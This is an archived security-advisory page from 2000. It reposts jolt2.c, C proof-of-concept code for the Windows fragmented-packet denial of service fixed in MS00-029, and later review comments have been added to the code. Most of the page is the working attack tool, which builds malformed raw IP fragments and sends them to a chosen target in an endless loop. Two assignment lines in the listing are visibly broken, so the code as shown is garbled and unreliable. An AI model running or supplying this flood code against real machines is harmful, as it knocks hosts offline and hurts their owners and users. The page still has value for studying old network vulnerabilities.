Windows DoS code (jolt2.c) (fwd)

Type securityvulns
Reporter Securityvulns
Modified 2000-05-26T00:00:00


This is code for the new DoS discovered by Razor a few days ago (the issue Microsoft addressed in bulletin MS00-029). It forces CPU utilization to 100%, making everything move very slowly. Tested against Win98, WinNT4/SP5 and SP6, and Win2K.

An interesting side note is that minor changes to this packet cause NT4/Win2k (maybe others, not tested) memory use to jump substantially (+70 meg non-paged-pool on a machine with 196 mb phys). There seems to be a hard upper limit, but on machines with smaller amounts of memory or smaller swapfiles, ramping up the non-paged-pool this much might lead to a BSOD.


/*
 * File:   jolt2.c
 * Author: Phonix <>
 * Date:   23-May-00
 *
 * Description: This is the proof-of-concept code for the Windows
 *   denial-of-service attack described by the Razor team (NTBugtraq,
 *   19-May-00) (MS00-029). This code causes cpu utilization to go to 100%.
 *
 * Tested against: Win98; NT4/SP5,6; Win2K
 *
 * Written for: My Linux box. YMMV. Deal with it.
 *
 * Thanks: This is standard code. Ripped from lots of places. Insert your
 *   name here if you think you wrote some of it. It's a trivial exploit,
 *   so I won't take credit for anything except putting this file together.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <getopt.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/udp.h>
#include <arpa/inet.h>

/*
 * One raw packet as built by do_frags(): an IPv4 header, then either an
 * ICMP or a UDP header (a union, so both occupy the same bytes), then a
 * single payload byte.  Member order is the wire order -- do not reorder.
 * do_frags() computes the number of bytes it sends from the header sizes
 * (iplen + icmplen/udplen + 1), not from sizeof(pkt), so any tail padding
 * the compiler places after `data` is never transmitted.
 * NOTE(review): nothing forces a packed layout; the header structs come
 * from the system headers and are expected to have no interior padding,
 * but that is not asserted here.
 * `pkt` is the single file-scope instance that do_frags() fills in.
 * (The tag `_pkt` begins with an underscore, a reserved namespace in C;
 * kept for compatibility.)
 */
struct _pkt {
  struct iphdr ip;          /* IPv4 header; do_frags() sets ihl = 5 */
  union {
    struct icmphdr icmp;    /* used when no port is given (ICMP echo) */
    struct udphdr udp;      /* used when a port is given */
  } proto;
  char data;                /* the one payload byte */
} pkt;

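/* Header sizes used by do_frags() to size the bytes put on the wire. */
int icmplen = sizeof(struct icmphdr);
int udplen = sizeof(struct udphdr);
int iplen = sizeof(struct iphdr);
/*
 * The raw socket, shared with quit() so it can be closed on error.
 * Initialised to -1 rather than relying on the implicit 0: quit() is
 * reached before socket() is called (bad destination address), and with
 * the default 0 its close(spf_sck) would have closed stdin.
 */
int spf_sck = -1;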

/*
 * Print the command-line synopsis to stderr and terminate.
 * pname: program name (argv[0]) shown in the synopsis.
 * Exits with status 0 in every case, including when it is reached
 * because the destination argument was missing.
 */
void usage(char *pname)
{
  const char *synopsis = "[-s src_addr] [-p port] dest_addr";

  fprintf(stderr, "Usage: %s %s\n", pname, synopsis);
  fputs("Note: UDP used if a port is specified, otherwise ICMP\n", stderr);
  exit(0);
}

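/*
 * Resolve a host name or dotted-quad string to an IPv4 address.
 * host_name: name or numeric address to resolve (NULL is rejected).
 * Returns the address in network byte order, or 0 when the lookup fails
 * or does not produce an IPv4 address.  Note that "0.0.0.0" also yields
 * 0, so callers cannot distinguish that input from a failure.
 * gethostbyname() is used as in the original; it is not thread-safe,
 * which is fine for this single-threaded tool.
 */
u_long host_to_ip(char *host_name)
{
  struct hostent *res;
  struct in_addr addr;

  if (host_name == NULL)
    return 0;

  res = gethostbyname(host_name);
  /*
   * Accept only an AF_INET answer of the expected size.  The original
   * memcpy'd h_length bytes into a u_long without checking either, so a
   * larger address family would have written past the target object.
   */
  if (res == NULL || res->h_addrtype != AF_INET ||
      res->h_length != (int)sizeof(addr) || res->h_addr_list[0] == NULL)
    return 0;

  memcpy(&addr, res->h_addr_list[0], sizeof(addr));
  return (u_long)addr.s_addr;
}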

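/*
 * Report a fatal error and terminate the process.
 * reason: prefix for perror(), so the errno text follows it.  (Callers
 * that reach here after a failed gethostbyname() get an unrelated errno
 * message, since that call reports through h_errno.)
 * Closes the raw socket only when one is actually open: with spf_sck at
 * its implicit file-scope default of 0, the original unconditional
 * close() closed stdin when quit() ran before socket().
 * Exits with EXIT_FAILURE instead of exit(-1), which produced status 255.
 */
void quit(char *reason)
{
  perror(reason);
  if (spf_sck > 0)
    close(spf_sck);
  exit(EXIT_FAILURE);
}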

/*
 * Build one malformed IP fragment and send it to dst_addr in an endless
 * loop.  Never returns: the while(1) below has no exit, so the trailing
 * `return bs` is unreachable and sendto() failures are never examined.
 *
 * sck:      raw socket opened with IP_HDRINCL, so the IP header written
 *           here goes out as-is.
 * src_addr: source address placed in the IP header (network byte order,
 *           as produced by host_to_ip()).
 * dst_addr: destination address, same byte order; also used as the
 *           sendto() address.
 * port:     non-zero -> UDP to that port; zero -> ICMP echo.
 *
 * The packet is sent as psize bytes: IP header + one transport header +
 * the single data byte, computed from the header sizes rather than from
 * sizeof(pkt).
 *
 * NOTE(review): this is the published MS00-029 proof-of-concept payload.
 * Values that look wrong (tot_len, the zero checksums, sin_port without
 * htons) are left exactly as published; the malformed fragment is the
 * point, so do not "correct" them without re-checking the Razor advisory.
 */
int do_frags (int sck, u_long src_addr, u_long dst_addr, int port)
{
  int bs, psize;
  unsigned long x;          /* declared but never used */
  struct sockaddr_in to;    /* only three fields are set; sin_zero is left uninitialised */

  to.sin_family = AF_INET;
  to.sin_port = 1235;       /* not htons()'d; presumably irrelevant on a raw IPPROTO_RAW socket -- confirm */
  to.sin_addr.s_addr = dst_addr;

  /* Bytes on the wire: IP header, one transport header, one payload byte. */
  if (port)
    psize = iplen + udplen + 1;
  else
    psize = iplen + icmplen + 1;
  memset(&pkt, 0, psize);   /* zeroes only the bytes that will be sent; pkt.ip.check stays 0 */

  pkt.ip.version = 4;
  pkt.ip.ihl = 5;
  /*
   * The 40 is added after htons(), so the on-wire length field is not
   * simply 68.  icmplen is used for the UDP case as well; if both headers
   * are 8 bytes (as in glibc) the value is the same either way.
   */
  pkt.ip.tot_len = htons(iplen + icmplen) + 40;
  /*
   * The left-hand side of this assignment was lost when the listing was
   * extracted; in the published jolt2.c it is presumably pkt.ip.id.
   */
  = htons(0x455);
  pkt.ip.ttl = 255;
  pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP);
  pkt.ip.saddr = src_addr;
  pkt.ip.daddr = dst_addr;
  /*
   * Fragment offset 8190 (x8 = 65520 bytes) with the MF/DF bits clear
   * (8190 < 0x2000): a lone high-offset "last" fragment with no first
   * fragment to pair it with.
   */
  pkt.ip.frag_off = htons (8190);

  if (port) {
    pkt.proto.udp.source = htons(port|1235);  /* bitwise OR with the port, not a fixed source port */
    pkt.proto.udp.dest = htons(port);
    pkt.proto.udp.len = htons(9);             /* 8-byte header + 1 data byte; check stays 0 from memset */
    /* Left-hand side lost in extraction; presumably pkt.data. */
    = 'a';
  } else {
    pkt.proto.icmp.type = ICMP_ECHO;
    pkt.proto.icmp.code = 0;
    pkt.proto.icmp.checksum = 0;              /* never computed */
  }

  /* Flood: no rate limit, no exit condition, sendto() result unused. */
  while (1) {
    bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, sizeof(struct sockaddr));
  }
  return bs;   /* unreachable */
}

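/*
 * Entry point.  Usage: jolt2 [-s src_addr] [-p port] dest_addr
 *   -p port   send UDP to this port; without it ICMP echo is used
 *   -s addr   accepted for compatibility; see the note in the option loop
 *   -h        print usage and exit
 * The destination is the last command-line operand.  A raw socket is
 * required (CAP_NET_RAW / root).  Does not return on success, because
 * do_frags() loops forever.
 *
 * Fixes over the original: socket() failure is detected (it returns -1,
 * which the old `!spf_sck` test could never catch); the host-name buffer
 * is NUL-terminated after gethostname(); the port is parsed with strtol()
 * and validated; an unknown option or a missing operand prints usage
 * instead of resolving an option value as the destination.
 */
int main(int argc, char *argv[])
{
  u_long src_addr, dst_addr;
  int opt, port = 0;
  int on = 1;               /* flag value for IP_HDRINCL */
  char hostname[256];

  if (argc < 2)
    usage(argv[0]);

  /*
   * Default source address: the local host name.  gethostname() does not
   * guarantee NUL termination when the name is truncated, so terminate
   * explicitly.  If the name does not resolve, src_addr is 0 (0.0.0.0),
   * as in the original.
   */
  if (gethostname(hostname, sizeof(hostname) - 1) < 0)
    quit("gethostname()");
  hostname[sizeof(hostname) - 1] = '\0';
  src_addr = host_to_ip(hostname);

  while ((opt = getopt(argc, argv, "s:p:h")) != -1) {
    switch (opt) {
    case 's':
      /*
       * NOTE(review): as in the original, this assigns dst_addr, which is
       * overwritten below, so -s is effectively ignored and the source is
       * always the local host's address.  Left as published.
       */
      dst_addr = host_to_ip(optarg);
      if (!dst_addr)
        quit("Bad source address given.");
      break;
    case 'p': {
      char *end;
      long v;

      errno = 0;
      v = strtol(optarg, &end, 10);
      /* Reject non-numeric or out-of-range input; atoi() mapped garbage to 0. */
      if (errno != 0 || end == optarg || *end != '\0' || v <= 0 || v > 65535)
        quit("Invalid port number given.");
      port = (int)v;
      break;
    }
    case 'h':
      usage(argv[0]);
      break;
    default:
      /* getopt() has already printed a diagnostic for the bad option. */
      usage(argv[0]);
    }
  }

  /*
   * The destination is the last operand, as in the original; require at
   * least one operand so an option's value is not mistaken for it.
   */
  if (optind >= argc)
    usage(argv[0]);
  dst_addr = host_to_ip(argv[argc - 1]);
  if (!dst_addr)
    quit("Bad destination address given.");

  spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW);
  if (spf_sck < 0)
    quit("socket()");
  /* We build the IP header ourselves in do_frags(). */
  if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0)
    quit("IP_HDRINCL");

  do_frags(spf_sck, src_addr, dst_addr, port);
  return 0;
}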